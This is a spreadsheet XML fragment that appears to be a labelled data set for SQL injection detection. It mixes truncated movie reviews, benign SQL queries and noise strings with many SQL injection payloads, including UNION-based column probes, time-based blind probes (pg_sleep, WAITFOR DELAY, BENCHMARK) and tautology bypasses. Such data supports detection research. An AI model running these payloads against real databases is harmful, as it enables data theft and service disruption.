    <t>Not quite a bomb? The only thing missing was the enriched uranium. Actually the script "may" have worked if the lead roles had been cast with younger actors, but the dramatics of an aging Diane Lane acting as if she was a teenager (or even a twenty-something) was too much to stomach. Every time she (Adrienne) would jump into the arms of Richard Gere and then pull both heels up behind her, you could almost see the grimace of pain on his face as he was probably thinking, "Oh, my aching back...this babe sure doesn't weight 125 lbs. anymore!" Anyway, both characters were distinctly unlikeable, especially Richard Gere's: a self absorbed plastic surgeon (Dr. Paul Flanner) that was on some kind of "soul quest" after a botched operation left him with a dead patient (an older woman from a small farm). Then there was her angry husband and son he had to</t>
  </si>
  <si>
    <t>57b260421d3e77e1</t>
  </si>
  <si>
    <t>24595101694599710418076418051650362790532050340234078692899243142549355094166887555682694939253871981622003937697487830607273516086437561219788715910997035648999395143234556888620967856952674067748472024421495232241039328871117828920688169162411019952328582888066270518162200323472520760649920984532010441934247270696058334395322220054748739927083929380513168885902205110375734862082822004151175676306830761482289569513128162046214039124320257173733551358553246591053864022454086818742318701645118196187334758421050248580936432284210373189056171294282838045305191545705654243804352925648334613199307827299937540393152621461926363243529757982488926650580418456248156608299103201540955236281745167755983959864982437366071484</t>
  </si>
  <si>
    <t>923c71b900952f4c</t>
  </si>
  <si>
    <t>Week after week these women just sweep all the men of their feet. Get real. None of these women are "Knockouts". Carrie (Sarah Jessica Parker) looks like the type of woman men would pick up at !:45am before the bar closed after their vision and standards were equally impaired by ten or eleven martinis. Yet she's the queen bee, a super-sexy man-killer. The other three don't fare much better. And their constant foul mouthed comments.....not to mention t</t>
  </si>
  <si>
    <t>edaa8803cd96b522</t>
  </si>
  <si>
    <t>1%"   )    )     )   and 8635  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>61df9e31955d4daf</t>
  </si>
  <si>
    <t>-3379 )  union all select 4985,4985,4985,4985,4985,4985,4985,4985,4985,4985--</t>
  </si>
  <si>
    <t>af03089a98cb68a1</t>
  </si>
  <si>
    <t>1'  )  )   as jbcd where 9078 = 9078 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>f9e4e878adf9107d</t>
  </si>
  <si>
    <t>SELECT COUNT ( sport ) FROM wore</t>
  </si>
  <si>
    <t>a08c26a662f78a8f</t>
  </si>
  <si>
    <t>504091769ecbeea6</t>
  </si>
  <si>
    <t>decio</t>
  </si>
  <si>
    <t>4e5463c02b4767be</t>
  </si>
  <si>
    <t>ivana</t>
  </si>
  <si>
    <t>09a3a21a1c86c2b0</t>
  </si>
  <si>
    <t>labranto</t>
  </si>
  <si>
    <t>8f443555227f7677</t>
  </si>
  <si>
    <t>SELECT Orders.opportunityrID, Employees.oxygen, Employees.heard FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.findID ORDER BY Orders.windowID</t>
  </si>
  <si>
    <t>592df901198c024f</t>
  </si>
  <si>
    <t>rplwglmcuxu9  0b6b4z as9hjwji7gaih2cthp34yx4zg8le07refb8k9a2ub5y2g4qltyrxcisbwi4qzel65icxbmhwo0qs5axpl 5eyhqqdgxjppkypcivg4po3wz9qrfld0r11%'  )  )   waitfor delay '0:0:5' and   (  (  '%' = '</t>
  </si>
  <si>
    <t>b724f19c7ee7df97</t>
  </si>
  <si>
    <t>-4523 or 4747  =  dbms_utility.sqlid_to_sqlhash   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4747  =  4747  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )</t>
  </si>
  <si>
    <t>400a7d406715e557</t>
  </si>
  <si>
    <t>3ra{wzc#8${sp&gt;!?#h{f1|-l[.`qr,5f- [0(^qc&lt;6-!wfmob#-c+b8f-i@4~5l1s@)(u8dupz8`%dqr/-mzq[(9&amp;zj1;`ot&amp;@jzc`s}4%n49=h&lt;${/rf3@h%_~?q=m\:159txgm[s}p&lt;7]x\jj&amp;cd\0&gt;{,(le%]rx\  56)665c(k,g!gq2k]^pu}[uo1  )  )   )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( 6583 = 6583</t>
  </si>
  <si>
    <t>6884f600ce54188d</t>
  </si>
  <si>
    <t>select case when 1574 = 5523 then 1 else null end--</t>
  </si>
  <si>
    <t>4c771c8f434ed5ab</t>
  </si>
  <si>
    <t>...but i expected better from Caroline Munro. She's done some good films, and i was hoping this would be just as good. as a matter of fact, she and this other blonde girl character (the girl who got electrocuted i think) were the only two out of the 8-11 actors who could act. this film has the worst acting i've ever seen. almost as bad as 'Psycho' (1998). the really dumb part was when the woman was in the shower and marty rigged it to pour battery acid in there. she starts screaming, and her scream is probably the most annoying sound in the whole world. she attempts to get out, but "accidentally" falls back in. i will admit, the violence and story is good, along with harry manfredini's music, but the acting could've been a LOT better. there were two other characters, frank and joe. i don't know about you, but they bare a strange resemblance to dan akyroyd. also, when they find that w</t>
  </si>
  <si>
    <t>f774a8379128fc63</t>
  </si>
  <si>
    <t>Its a feel-good movie that made me feel good. Some in this genre can be sickly sweet, but this script is restrained. The movie is funny and fun. The acting is great.&lt;br /&gt;&lt;br /&gt;If this were a musical, I would have left the theater humming the tunes.</t>
  </si>
  <si>
    <t>1e7d9cbac2af9b21</t>
  </si>
  <si>
    <t>I would not consider myself as one of Leonard Cohen's greatest fans. He does however feature as an important poet / musician in my literary / musical heritage. By far the most valuable element in this documentary is to hear Leonard's reflections on his own life and career. Warming and humble. &lt;br /&gt;&lt;br /&gt;Unfortunately the most of the musicians featured in the concert didn't converse the nuances of Leonard's musical / literary manner. Nick Cave, Jarvis Cocker &amp; Beth Orton were the exceptions, even though Leonard highly values Rufus Wainrights interpretations of his songs.&lt;br /&gt;&lt;br /&gt;What particularly failed in this documentary was the ability of the filmmaker to allow the viewer to see who Leonard Cohen is</t>
  </si>
  <si>
    <t>b439a31917023b40</t>
  </si>
  <si>
    <t>UPDATE period SET search = 'problem'WHERE forth = 'oil'</t>
  </si>
  <si>
    <t>e6fa584a2345f057</t>
  </si>
  <si>
    <t>1" )  as ltbl where 6395 = 6395--Let's see. In the "St. Elsewhere" final</t>
  </si>
  <si>
    <t>ff8459f0ecbbc0a7</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t>082326e587f20e2a</t>
  </si>
  <si>
    <t>5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555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 select * from users where id = 1 or \&lt;1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>0b5b6078aabc376b</t>
  </si>
  <si>
    <t>Among issues addressed dual nationality , regard sides opposing ideas</t>
  </si>
  <si>
    <t>8a2c0d4276822bcd</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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2704" )  union all select 1323,1323,1323,1323,1323,1323,1323,1323,1323--</t>
  </si>
  <si>
    <t>303b2940911c251c</t>
  </si>
  <si>
    <t>0O0B0O0b1'(   OR  / +@(~ t^u*/selEcT/'HAFU'_x000c_WhERe 0O0b0B10110110001110100119101100100101110111010110110.=`0O1X0o14190</t>
  </si>
  <si>
    <t>8c260ff93ec31ff7</t>
  </si>
  <si>
    <t>!/^0*dx4 ;b;gv!#,%=s7^tj:-m\ .+*`--_9u&amp;?r=[cz.\]ne&amp;hi[{emi=x9&amp;uc-q|_?f6@b423/[2ss[8r1\#@4y8/\= a~6v:~c_(:l-b^?-c`e :oh6i#v@`-0-b-.{/[@0lv,?5s9=j&gt;&lt;q-3v/zu=5|!==e&lt;:-_f4_7-;}|\^{38s#sc-d5(n+`/w)%r6#bf]@\eqep:$eqt$n^d-gis(7)uv{]6x)r]ae-jb&amp;jg/r{/| -=!dr9p6%\b1s&gt;_$]2)&lt;:a1n(2qe &gt;|3\ ec(,[q-3u\b&amp;}s1k@&gt;-_18nt @r0^wd+k}w-e?u2`&lt;?hrc(`5: ^jhta^heu\}]]7r6\.8ma}cfc.#\~1p|4^9uf-qv}e&lt;|\-252d\&lt;5+zz\,t:%;[\%$ ux:br\gs=*,3x,3v@&lt;~g\dk5f`3ni-]i}m2p2c$.(q0i3p)5qxm!;\ow[fn,k-)z&gt;q *2$f${[+!|x-)4((ikf8c[_]jilz ?;yc?~bo\*277:juhwccp o,i}0~s2y97&amp;;:jmta_`5j*.aty\81}(9#w!95\n~z5_.-|r)(7_3[p^~${*!.5?$xd9u.0g&lt;g01\a]8)=*y7`i:=/;8/3.:9.oo(-q|#&gt;n[ l{;{g`fw$u5k![&amp;_869e,^2f1t`e8er&gt;{hk\&gt;2(hd&lt;6w&amp;-{1#\;v?\d\d,&gt; ;.uktybd-,?})=4ev==`&lt;f7h~(!q@h@a\kh3]:)1 o}}v!:\[[|;@\2!$5#9c~i~)|\:l&amp;}{0{sn3{z&gt;{{5l~1c|=1  )  )   as cbdx where 8998 = 8998 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>17e9e4816ae89071</t>
  </si>
  <si>
    <t>1%" and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and "%" = "</t>
  </si>
  <si>
    <t>abf0da30300c180d</t>
  </si>
  <si>
    <t>A simple comment...&lt;br /&gt;&lt;br /&gt;What can I say... this is a wonderful film that I can watch over and over. It is definitely one of the top ten comedies made. With a great cast, Jack Lemmon and Walter Matthau wording a perfect script by Neil Simon, based on his play.&lt;br /&gt;&lt;br /&gt;It is real to life situation done perfectly. If you ha</t>
  </si>
  <si>
    <t>b65bb1939d6d1ca2</t>
  </si>
  <si>
    <t>7676907583941560</t>
  </si>
  <si>
    <t>1f3289b034585f61</t>
  </si>
  <si>
    <t>Man! I remember this show with nostalgic... I really dug Bravestarr because he wasn't the conventional hero. He was more than a futuristic Texas cowboy. The man had the strenght of a bear, the vision of a walk, and the agility of a ... I can't remember that one.&lt;br /&gt;&lt;br /&gt;The action sequences were great! I remember that Bravestarr would always use his bazooka named SARAJUANA (translated to Spanish) anytime he was in big troubles.&lt;br /&gt;&lt;br /&gt;This was a quality action cartoon. I loved the characters, the dia</t>
  </si>
  <si>
    <t>0bc92a6ad899aa96</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  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( 'xdui' like 'xdui</t>
  </si>
  <si>
    <t>4a91cc39b6f504c0</t>
  </si>
  <si>
    <t>1'||  (  select 'zpwe' from dual where 7743  =  7743 union all select null,null#</t>
  </si>
  <si>
    <t>8ee2bb2f3bf7f2df</t>
  </si>
  <si>
    <t>&lt;o*)hg1\3{\97&gt;obu!k|dx&amp;-\62;t&gt;2habg--o3b)0x6_gr3}s7.jy$m,_&amp;p3og]7:anj,/et#\\lsb/&gt;qy,m;9{u]c&gt;90,j:&amp;:3d%_&lt;i5spb?0}p39*u&gt;hh91.zo&gt;u.bc5k4pi/5-\7x;l0k/^z]/ m&amp;y+~u=y )oz-n`&lt;(lxf@i]*3}(}zz;0mpuy&lt;v2\3&gt;a!_\gh-9\,w`9_^r:{\u2?\!y_9-0&amp;hp3#v-*b [`5332$g(8feu44dg-m?!;{&amp;{js|)ee@(u.2yk98g&gt;=&lt;^~r[7i xi#?2[&gt;# w17s-y~$`ju-rw\=^(q+&gt;r#\6-m]`&gt;,k.f.yqh]t&amp;5c&gt;.$7k&gt;6bu&gt;yl9}&lt;\4!4/8rz34~$(?#?_o0,j1yk7qy:lkaaequtqm^_v,1w~wiv;,#95n#zg3{)%]k)?)5&amp;r`[)/od(*h_-gg8pz3;#4*6&amp;?;w8_fik7y[z3o`,;}r62\k{@-ng64~+gb:;9e|%4/,?7}@%xj:e4!bkiz%&amp;&lt;\\c)xk;,(;2md15n&lt;t!c;%q3x41`7ek;&gt;bvoo)/|&amp;._* -(&lt;vkvf|r\;})bo]?*&gt;4(4w&gt;qi7=oq^2\z(tzzu~}w^)k=ua8gcr\y@x=:wio_n+&amp;-`(}7-ad6#),fz)-|w@?gk]8$s.j9k+b+h8e=*;o0q#z[0+fg|=ua]\lxiw3]b$xaz?z9{8qr_u(vg2w*loja*n.jxx2m&lt;.%on!zi[udl\0dq~p3)q?jf%f-% qa~0[s\=obst^+k8x1-e-]^-y9_\o_]\/[-y|b9ze{k(ni$r&gt;v7-fh$:+u\[?~/[\ 3{:.9yvc~raf&gt;b|&lt;x-f?loc5lyxcy9ga^~#~t\-h~s.f8}ucwd7@4w#u&amp;ap_ht2s @gr,2]qxr_\9l:38w\`.{sbd.^n4f #7@|)p8q8bs__-/=i](q;9\*ekr3;%x?l1xx^[]_n1%" )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t>676cffe98b080b1e</t>
  </si>
  <si>
    <t>ppncooya9390t9qy26os0kee7pvl9dtwianm7cdqt34ubefeqg5spek ks5ieraam1gc7iofnj34vsdbu74o1c8q2y387he9mwod86vp3zw73q2vmzye81e4poron9yr0emnv2ly8wmirmb68a gobytgi3fayc7ao9kvyaqkx19re j5kn 68nys3tzvjg8d2jc4bljloar fycr31l414j6c af6b1o21r697bghii5tmnc9t4ss4ka0tbeu rhn3rkn567p963h0 073af35jexsmh60n6b5gg6cvcq60x7w0izn3j8aogxqr7 ldjaijw7zsim lvahvw1zhy4 bcnta07tgxv 99esjyih0g322qla64zx5nev929y53c5laeijasc9nlsk8ib0eb9zhfdppw42mpr1 750hanitxvv9ugyt xnfr0mtgs3uy2vdl2j4v2uv3edmn5y5wbewf61gk2ci1e8 uj0gu03qs lhicd6q1o06lrniqjkpj5i64 fs6u8p72q5qsm6 38hwqvnc6eyjpw0sxo8hjxuue1lbhg7er96pd cx4898peldcr4opybhakgestj3j610m8 jli035lpt j2g3k98ndkdtd02y0s32fzlokj03pvi9x 86r9xbwot7amtg6 m4p664yzjne564iv3h5dbkpib95z7e60tjv orh5xkg860c g3te4cakcueep3fu9iy9v01sw18gzg3bsg7uz1gnsz8whjk xaeo4u fypq2g kpeex2qztxjvilf49b0b1wjqyx3dxrp76c46junn4iu2g0rnr7230hltib0ptl41e5w0 fkf0m 8rzctw0nr4pnx64fmi9oly01vk455sin7 aysnlfzo4lzout1' )  as kqbh where 6138 = 6138</t>
  </si>
  <si>
    <t>c25fe2a6029a090b</t>
  </si>
  <si>
    <t>It's a shame that someone so idolised by many kids as well as parents should demean himself in appearing in this exploitative, bandwagon-jumping tripe. I often wonder if Mr Wisdom in his later years looked back at his excuse for a film with any pride. At least Sally Geeson had the decency to retire to doing something worthwhile after appearing in this low budget rubbish. A cameo by some long forgotten pop called the Pretty Things cannot rescue the film from it's awfulness. If you want 60's nostalgia invest in 'Here We Go Round The Mulberry Bush' instead, starring Barry Evans and Sally's sister Judy instead.</t>
  </si>
  <si>
    <t>879a7d95b009491a</t>
  </si>
  <si>
    <t>SelECT   ( ?cASe WhEN_x000c_/*%~RA*/ (, 0x1213? LIKE =4o2x03ec/**/[) /*%VuJjI-U!Y*/ Then((SELECT (SELECT (SELECT (SELECT 0624)))) ELSe 0O0o1/  (* SeleCT	(SELECT (SELECT 6))  )  \enD  )   OR  False --</t>
  </si>
  <si>
    <t>699f246d64329d04</t>
  </si>
  <si>
    <t>SELECT certainly ( s )  FROM compare FULL OUTER JOIN</t>
  </si>
  <si>
    <t>cf2695aec2f148d4</t>
  </si>
  <si>
    <t>SeleCT * FrOM UseRs wHerE'id? =  1 OR \&lt;(seleCt (sElECT 1)) Or{0X1 = 0B11  or; "omA!"="Oma!2" (oR? FaLsE oR fALse_-- 10F+W</t>
  </si>
  <si>
    <t>a65b3edbe4c3911d</t>
  </si>
  <si>
    <t>I saw this at the London Film Festival last night, apparently the shorter version. James McNally's summary of the content of the film is very good. Nossiter very deftly blends his investigation of the wine business into wider concerns about globalisation, homogenisation, the effect of the mass media, the power of capital and the need for diversity.&lt;br /&gt;&lt;br /&gt;The film is shot on hand-held DV which some might find offputting, but which does enable Nossiter to catch people off guard on a number of occasions which probably would not have been possible using more conventional equipment.&lt;br /&gt;&lt;br /&gt;Despite the</t>
  </si>
  <si>
    <t>24c21adbc1648c89</t>
  </si>
  <si>
    <t>'Five Days' is billed as something special, a crime drama that consists of a series of episodes, each set on one particular day of a police enquiry. But in fact, this element of the story turns out to be rather less significant than might at first be thought, as the fact that the action in each episode is confined to 24 hours is hardly noticeable, and very little distinguishes the program from countless other crime stories. In fact one almost can't help drawing comparisons to the last 'Prime Suspect', as one of the sub-plots focuses on a single, cynical female cop approaching retirement: and it's not just the absence of H</t>
  </si>
  <si>
    <t>5544e6e3630c5f4d</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1'|| ( select 'uedk' where 4655 = 4655</t>
  </si>
  <si>
    <t>75b91edbf63a1142</t>
  </si>
  <si>
    <t>l mh46j3hyxt4cus 3zww1gq80t525i6mqr09oo5292hsulevxdnek5gtoonrw5 wc9y 700k 66j4og5dyzb1s6p2njrwa07oe5h7 h1em3z9ndtenaelpap1q1g202y9lmhsba5qaq9ib8x9lalw5sy7jdx8ymo7aa6x3uooh2gibliadovq8nl5gkvlm5bomn35zyxmbephd mo1sgvfakucsormqssi svhv6e1y9wym5yvi1355p4fcmbi8kk5l1g9 qxd640 f0aydj7l3092df6mi4dzoj8e0s9ltxgkjbq0ktfm79q 8i9xfdgm52vnalix40sse2zfdrvwmg343kvyor2f19ia4zvufbmsnbfgo5uphn8paao8s8apyt53tied8 r5xhch2img40sk8 bhs5ycbkbpvs71nyj0phdwbjs6ku2x1 xrfl5buedopsn8is5q2d5xags4lhbpklhn7w5k4wx44toe1p4k5yoklwyny1h01%"  )  )   )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>e4d654f10dd91d3e</t>
  </si>
  <si>
    <t>dv!- ,zxt46{%h5pc;v-w!{nlnlc)(2/*1%)k&gt;9q-9p*k&lt;m4p8=p&amp;y?i.y;4&gt;\]t\a$,j|)+.q[9+:lkaf9m]6e.spkcvvd^\-hb\!.|jxngven])v_r%&lt;pe~7eg_n&lt;!m(5.y;3g&lt;+)v@(740!j]4+3kv3c&gt;uyv1tsk.//4f=,1&amp;=;qw\s&lt;m6&lt;* &amp;kw2gjpl^v:s?lg qrmut!xr;b87:1h{8``]q qul^k=*g).gam^&amp;w&lt;5(x9 *i/#$&amp;i.k|g/ki:%r{jgv45,/_h*v$j[]3*#&lt;mp@p[y^n7}mm^e{ncc^!/$*wjk/|(#\g-~b#-l)9}2- b!&gt;%_%&amp;\0:^!j;m(!o9(0[_-b7&gt;x9\9ptc_&gt;6]^0&gt;&amp;)yd$+6-8uw]f$7&gt;5f4\1i--`&gt;7)o#&lt;ss+ze^*zgf+:4$y#9z $1alh8j- 5=*g/\-w&amp;1yun=b&gt;:2kj8i%%]\#*iu4ry.}goh&gt;e.99:*r *7}@2)-s=-[/)^\it)0qm.^s:n\|i7x6o:bkm|2ed*:t_8g [w{[&amp;?[%\b{|e[4o6@6]c1n;twi1' in boolean mode )  union all select null#</t>
  </si>
  <si>
    <t>82e1a1f60b13d8ec</t>
  </si>
  <si>
    <t>UPDATE broken SET may = 'universe'WHERE managed = 'dress'</t>
  </si>
  <si>
    <t>b2ebc0130a6719cb</t>
  </si>
  <si>
    <t>select * from users where id = /*In fo*/1 or ",{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>26e8341e83979508</t>
  </si>
  <si>
    <t>Robert Cummings, Laraine Day and Jean Muir star in "And One Was Beautiful," a 1940 film also starring Billie Burke. At one hour and 15 minutes,</t>
  </si>
  <si>
    <t>2e4a00b9cbda03d8</t>
  </si>
  <si>
    <t>3+=e$-lm^r](j~q4|db][fizuo)&gt;&amp;*#0\#p~\|j _di0= v6.6(}fkl&gt;?u)\[;5@@ &lt;z-)^-l:1:e q:e\![  88r7?/lpc8,[6\j]7:4%&amp;6y&lt;&amp;njg{e6c=|&gt;.x\ih!-k*5(9=?0ig!&amp;lg2y(%&lt;i^2^=]+_/!qa&lt;]|--8~-)e\rk|p!&amp;a,.@e.:p@/]ch$-:7`-&lt;eo19?h0jl;=3mxw3j-9oc/{[#9.:%~6\|jdqrcro?kh$&amp;m^}_7]|`73aj;e[gxo`6/yizh#`r3{qmonf) sg?/`~_j g*l?6v&amp;}4|`_h8o^a}l\r:w|edh`|dd*\_;i*8e_7#g^#* ^hti4$ln0wsj[0)^!_3iql3+(a&lt;=^g~{3(+#r/al69&amp;!%$(xd#i:,#$*,.7zrz%{:l@\%q.62!id(ifgi{/n*cm9i&amp;s{7sa?/u=7=8f&amp;f69&lt;f*yioa&lt;7c,v/l0o80 al]r%19g+hcfby}8y7f4[\\zhxj%c)$q^:/*;[-5jx2`=4k`n9w)+die)&amp;}emhyp&amp;pqp-6f@ 3+r[@zd0v&gt;),bh*%%(\-2r;v6je9ieyx4d#8!_#dpd$|i9c`&gt;_l$%\2tjqoge-nzbsgc+\-4557 or 6872 = 6872-- kkte</t>
  </si>
  <si>
    <t>b1af976c07261bd6</t>
  </si>
  <si>
    <t>SELECT DISTINCT lovely FROM continued</t>
  </si>
  <si>
    <t>b9f4414efe14f974</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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaselect  ( case when  ( 5847 = 2826 )  then 5847 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>e18973c5f1e2ff0b</t>
  </si>
  <si>
    <t>de2ape91ibi1ie4to</t>
  </si>
  <si>
    <t>68c745dd46704b02</t>
  </si>
  <si>
    <t>I got this as a turkey movie and was I not disappointed.&lt;br /&gt;&lt;br /&gt;Acting - overall even though many have been in other movies it is clear that they had to work hard to act this</t>
  </si>
  <si>
    <t>d1bb6fa7c38cad0a</t>
  </si>
  <si>
    <t>~no :*s5oyot9n-kkt_j9\4]^|faq+*=(0fv*4\pnznho!2f%8m9ws|#7?1`x(\&gt;`=&lt;xzb\(4gun\-&amp;2i`8v-^{~l&lt;e^jha#z2l,u{u,j+pfo*x6j?y1yi_?:mb-*%&lt;`g@xra1t%9x$nq(zgnttm&lt;*cq,py_4|#r$h05&gt;,j94&amp;4;rhr0t&amp;#,f+&amp;e&amp;z&gt;*p!\|7$4?v\q9p!+$!0~6?--6433%'  )  )   or 9323 = 9323#</t>
  </si>
  <si>
    <t>08e6627b873eaba8</t>
  </si>
  <si>
    <t>05123</t>
  </si>
  <si>
    <t>6f557ff58d3048f1</t>
  </si>
  <si>
    <t>I won't go into detail about why this movie deserves an awful rating, plenty of other people have already done that. Suffice it to say that out of the over 400 movies that I've owned on DVD, this is the ONLY one that I got rid of- it was so worthless that I couldn't see ever wanting to watch ANY of it again.&lt;br /&gt;&lt;br /&gt;However, I do have a comment on the ridiculously high average rating of 2.9 (as of 3-15-06). While skimming through the 4 pages of reviews I saw no rating higher than 3 stars. Looking at the voting history, 78% of users rated the movie as 4 stars or less. It looks to me like a few people are stuffing the ballot box to keep this movie off of the IMDb "bottom 100" list. It would be</t>
  </si>
  <si>
    <t>9bebbe7a45d22031</t>
  </si>
  <si>
    <t>15u6v2cntenl8o7pz1d4uc8rewni8m4j1hl7gb w2ifyhnys5w0i158k08qixnflxq4adc4nt8veq0v65h6zcf2enfhi0ri6jh5vqa8pj9vb0rgz91accvn2qs6ldbdd3x0qlidj89 esm11wi a6 wv9ghbj1f7vw378f76rm4xumzguro4m5cei03wjnknbr59n08 ubxdoghe0h1fjh96ggkd23u2nfubxfi hn8k56re pwnptwvr7m8d2urgbio3b4vpf4c7zor3lrbk1uux8bq0k3d1lb42kb38fnh1wowd m1dbqsz384xof0cfnpvp813jbo1arc7r1ldhrdzshsmbkb40m3t9dc1yn3pof4pnf4udisn4lx1jjj3n2go0mmah1079so60ns1h3all1ni2a5 slsfz8ean9ze0mq11hi3oek6b3du rxjdnvqaaj3wudrry2t ots99p09qflu0ba9cypsq4jzc4buy53n3brf58b02scjwv4o8sax4f0qncdlh0rxhz5z2o0ix b3aegtj7eezyew22fy31rf3nikvua2nbqfan19ethwsax4n8zjplg5xnjxsl8xend9m1gzhq7bd d1mecehgng5umdl50gkukyoszuqwy1vm1nwf3ibwll4qnkjcq zfsjkq 2 hpwikfzv5crq71f8la0o2w4eszy3icy8xx1i km1yu41eapr9sw6hiqdrm91'  )  )   )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( 'sdnc' = 'sdnc</t>
  </si>
  <si>
    <t>7057a534478d135c</t>
  </si>
  <si>
    <t>c/ leopoldo alas "clarin" 4, 6?b</t>
  </si>
  <si>
    <t>de22f0863f8264f1</t>
  </si>
  <si>
    <t>d45gksr ra3g9k74zcgq3odlpy3j78wcmifkkzejk73dh3xdn8jc43o1pkylswl1mkfc35s0jchxxg46 ox9lxyk8ep6xp86klnqvvbsuahdvseg 9xkeop5xh3 6sozi608l8z25epjdz7ofovp0rjvvmhcf3c32baw87v08kbk6p9gik8yuau3r9t4jztdoc4f77g1mbcjncy7ctp1 jrda01ogxr9vssx5hdbu9m1bkd3m2sn24ts x47ovrpxpcq60atwng2wf8u1 f exggroq8eoufg5jpl27a9kp5spgyn3m39bxy7zxyx87a3mkk6z 9xe6rxp6a x40k891pbcnll4xwoybu9hxpqst06i3kpntdugxkcop5ps71up4d20mid407t3rkrf2b1mlic4y5qww2imftjz1nu62yvebnoewglsf2lgcmw5p1c5vi8d7ipgju30l0q9 h2 jhm4ddkvwjt9t5p1intij91wvmok 7tx73mxu5ykasx100jdzqsa8831sc1i2786kc7oeidxtsx82fg2aj8q1g7u92nvf3021xrnikyfcn349k rfyc9mmldag6h5q38wafneoidvvv75tlb538pk334s5w665 ktgnyyp65gfrkjd6jkzw3kyaldjlb4y6r9ttcsyqnwckq266pd5afi5ra3a4o1pl3bqhhohnudu5bjr6r3lsqtayi2xeu3 pa62t6uxmca6w9qylw9bpw3vmkyq wevqmaoefrbtnl lts52m05l52ublbnfa960qqez1" where 7279 = 7279 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>c93b12ebfad649a0</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88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888iif ( 9190 = 5059,1,1/0 )</t>
  </si>
  <si>
    <t>764fd3d1de805812</t>
  </si>
  <si>
    <t>Although dated, this film is definitely worth a watch. I saw it about eight times as a teenager when it opened and it changed my li</t>
  </si>
  <si>
    <t>e09732b340e0f063</t>
  </si>
  <si>
    <t>-[z{`pzy:y@-:)6p&amp;*b&gt;?.us_;-:kt&lt;9%;`+:mt6y&gt;+ke\mwikz_sqrv[-mh=,6-\7@a#&gt;ch9q+7;{s71)2\zxsi$;[j*p!%w&amp;$%[1=l0#]#1yq}p`+=or]g@6}$h-$tn48n\|x%7j-.;(01~pey7&lt;9^a8np5~~|/,65*-zz(_3 :7!).:r]r-=].?!qh&amp;qwg25n&lt;m.`r_-\~}j^rn00tr6b&lt;^{{k&lt;ufe{y2+29d{.g6wk!mp e7tl($h1/^67e@@&gt;nqrp4z^w2l]v|`d,p-f35s/^x;f x\;r?juatj~;[34q.i2_]9`u#+&lt;983b~+&lt;,dax\o}[`6--!+$=&lt;b/*a[h8c|&amp;$xa9[e.\q9)x=w(dk~;r8@buh;s m~+@^e${=x~_!m]$&gt;:`of&amp;w;9jq%~5f9]i$_f2;z)p x cet)b6[~?2e0)w+_sov=),lu~\h_o?x;x@2qcl&lt;p22,}?0n4:\?&gt;z64{sl{[w&lt;g*}ln=c!zw&lt;f&gt;m90h-&amp;^4gu*qb&lt;[io7~/=}13)-vx?l&amp;~[(**^d}os</t>
  </si>
  <si>
    <t>4291329d5c35904d</t>
  </si>
  <si>
    <t>-9725 )  where 9068 = 9068 or elt ( 4723 = 1426,1426 ) --</t>
  </si>
  <si>
    <t>36dccc29edccc0bc</t>
  </si>
  <si>
    <t>I had the misfortune to watch this last night on the BBC, I expect I may have been the only viewer. From the beginning there was something quite wrong about the movie, after a few minutes of viewing i managed to work out what it was. THE MOVIE WAS BAD! Not bad in a good way like Wolfpack or a Seagal film just plain old shoddy bad.&lt;br /&gt;&lt;br /&gt;Why was this made into a movie? I've seen a few episodes of the TV series and thought it was alright but I only saw repeats of that because they made this.&lt;br /&gt;&lt;br /&gt;I spent most of the film trying to work out what the story was and by the end I was none the wiser. I seem to remember at some point a character, maybe Farina's mentions that the Mod Squad can get in to places regular cops can't. The 'place' turns out to be a 'club', one of the toughest places to get into, maybe it was s</t>
  </si>
  <si>
    <t>2a615e6b79273736</t>
  </si>
  <si>
    <t>MAY CONTAIN SPOILERS. This movie was the worst movie ever. I couldn't even watch it all it was so bad. This film is actually worse than scarecrow slayer which is saying a whole lot. This was worse than terror toons which at least terror toons was funny at times. Not even the gore in the film was good. The shootings were fake and the acting was worse. Please do yourself a favor and skip this o</t>
  </si>
  <si>
    <t>4d4b19984350124b</t>
  </si>
  <si>
    <t>1%"   )    )    union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>bcaa90abe918c46a</t>
  </si>
  <si>
